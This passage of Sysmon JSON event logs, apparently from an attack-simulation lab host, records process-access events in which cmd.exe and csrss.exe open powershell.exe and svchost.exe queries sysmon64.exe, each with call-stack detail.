QQBBAD0APQA=","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4545,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-20BF-5F25-0000-0010B6C50600}\r\nSourceProcessId: 1640\r\nSourceThreadId: 2672\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-001085C60600}\r\nTargetProcessId: 4168\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.736","SourceProcessGUID":"{41C8662E-20BF-5F25-0000-0010B6C50600}","SourceProcessId":"1640","SourceThreadId":"2672","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-001085C60600}","TargetProcessId":"4168","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4546,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-001085C60600}\r\nTargetProcessId: 4168\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.736","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-001085C60600}","TargetProcessId":"4168","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4547,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4548,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4549,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4550,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4551,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4552,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.736","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4553,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.736\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 